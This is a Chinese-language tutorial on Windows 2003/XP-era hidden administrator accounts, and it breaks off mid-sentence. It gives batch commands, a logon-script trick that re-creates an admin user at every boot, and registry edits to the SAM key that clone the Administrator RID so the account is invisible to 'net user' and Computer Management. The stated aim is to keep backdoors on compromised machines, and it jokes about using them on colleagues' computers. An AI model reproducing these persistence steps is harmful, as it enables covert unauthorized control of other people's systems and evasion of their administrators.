windows 2003服务器创建隐藏账号以及清除隐藏账号的完美教程
一.建立一个别人永远删不掉的管理员用户

　　操作步骤：

　　1、在自己电脑里面建立一个.txt文本文件.

　　2、在里面输入内容

　　@echo off

　　net user yixiao 123456 /add 注释：前面yixiao是用户名后面123456是密码;

　　net localgroup administrators yixiao /add

　　3、把这个文件保存，更改后缀为yixiao.bat 注释：前面名字随便，后面格式一定要是bat;

　　4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\ｓｃｒｉｐｔs\Logon文件目录下，没有的话自己创建。

　　完成，下次对方电脑无论如何都有这个管理员帐号，删除了，下次启动还有!

　　如果把里面的内容改成

　　@echo off

　　net user administrator 123456 /add

　　意思是不管你怎么改，下次启动管理员帐号administrator密码一直是123456。

　　二.俺认为上述的方法并不理想，可以用隐藏帐号方法来建帐号会更好 。

　　操作步骤：

　　1、首先建立一个帐号结尾要带$号 ,如果yixiao$ ， 密码自己随便，然后把帐号删除.

　　2、将以下代码保存成(.reg)注册表形式

　　代码如下：

　　-------------------------------------------

　　Windows Registry Editor Version 5.00

　　[HKEY_LOCAL_MACHONE\SAM\SAM\Domains\Account\users\

　　names\yixiao$]

　　@=hex(1f4):

　　-------------------------------------------

　　说明：1f4是Administrator帐号十六进制的值

　　3、保存好后导入 ，然后用CMD命令设置密码

　　net user yixiao$ 123456

　　这样一个隐形帐号就建立好了，用户在“本地用户和组”内根本无法看到这个帐号。所以也不存在删除帐号。记得千万别在同事的电脑上捣鼓哦，如果被查出来。。。。。嘿嘿:-)

　　隐藏管理员帐号三分钟搞定

　　对 regedit.exe我想大家都很熟悉，但却不能对注册表的项键设置权限，而regedt32.exe最大的优点就是能够对注册表的项键设置权限。 nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\\SAM\\SAM键下，但是除了系统用户SYSTEM外，其它用户 都无权查看到里面的信息，因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体 步聚如下：

　　1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的，首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add

　　2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。

　　3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内，这里我是以administrator的身份登录的，所以我就将 administrator加入，并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组，切莫修改原有的帐户或组，否则将 会带来一系列不必要的问题。等隐藏超级用户建好以，再来这里将你添加的帐户删除即可。

　　4、再点“开始”→“运行”并输 入"regedit.exe" 回车,启动注册表编辑器regedit.exe。 打开键：HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\\names \\hacker$"

　　5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、 1f4.reg，用记事本分别打这几个导出的文件进行编辑，将超级用户对应的项000001F4下的键"F"的值复制，并覆盖hacker$对应的项 00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。

　　6、在命令行下执行net user hacker$ /del将用户hacker$删除：net user hacker$ /del

　　7、在regedit.exe的窗口内按F5刷新，然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

　　8、到此，隐藏的超级用户hacker$已经建好了，然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\\SAM\\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。

　　9、注意：隐藏的超级用户建好后，在帐户管理器看不到hacker$这个用户，在命令行用“net user”命令也看不到，但是超级用户建立以后，就不能再改密码了，如果用net user命令来改hacker$的密码的话，那么在帐户管理器中将又会看这个隐藏的超级用户了，而且不能删除。

　　建立与删除隐藏的管理员帐号

　　当黑客入侵一台主机后，会想方设法保护自己的“劳动成果”，因此会在肉鸡上留下种种后门来长时间得控制肉鸡,其中使用最多的就是账户隐藏技术。 在肉鸡上 建立一个隐藏的账户，以备需要的时候使用。账户隐藏技术可谓是最隐蔽的后门，一般用户很难发现系统中隐藏账户的存在，因此危害性很大，本文就对隐藏账户这 种黑客常用的技术进行揭密。

　　在隐藏系统账户之前，我们有必要先来了解一下如何才能查看系统中已经存在的账户。在系统中可以进入“命令 提示符”，控制面板的“计算机管理”，“注册表”中对存在的账户进行查看，而管理员一般只在“命令提示符”和“计算机管理”中检查是否有异常，因此如何让 系统账户在这两者中隐藏将是本文的重点。

　　一、“命令提示符”中的阴谋

　　其实，制作系统隐藏账户并不是十分高深的技术，利用我们平时经常用到的“命令提示符”就可以制作一个简单的隐藏账户。

　　点击“开始”→“运行”，输入“CMD”运行“命令提示符”，输入“net user piao$ 123456 /add”，回车，成功后会显示“命令成功完成”。接着输入“net localgroup administrators piao$ /add”回车，这样我们就利用“命令提示符”成功得建立了一个用户名为“piao$”，密码为“123456”的简单“隐藏账户”,并且把该隐藏账户提 升为了管理员权限。

　　我们来看看隐藏账户的建立是否成功。在“命令提示符”中输入查看系统账户的命令“net user”，回车后会显示当前系统中存在的账户。从返回的结果中我们可以看到刚才我们建立的“piao$”这个账户并不存在。接着让我们进入控制面板的“ 管理工具”，打开其中的“计算机”，查看其中的“本地用户和组”，在“用户”一项中，我们建立的隐藏账户“piao$”暴露无疑。

　　可以总结得出的结论是：这种方法只能将账户在“命令提示符”中进行隐藏，而对于“计算机管理”则无能为力。因此这种隐藏账户的方法并不是很实用，只对那些粗心的管理员有效，是一种入门级的系统账户隐藏技术。

　　二、在“注册表”中玩转账户隐藏

　　从上文中我们可以看到用命令提示符隐藏账户的方法缺点很明显，很容易暴露自己。那么有没有可以在“命令提示符”和“计算机管理”中同时隐藏账户的技术呢?答案是肯定的，而这一切只需要我们在“注册表”中进行一番小小的设置，就可以让系统账户在两者中完全蒸发。

　　1、峰回路转，给管理员注册表操作权限

　　在注册表中对系统账户的键值进行操作，需要到“HKEY_LOCAL_MACHINE\SAM\SAM”处进行修改，但是当我们来到该处时，会 发现无法 展开该处所在的键值。这是因为系统默认对系统管理员给予“写入DAC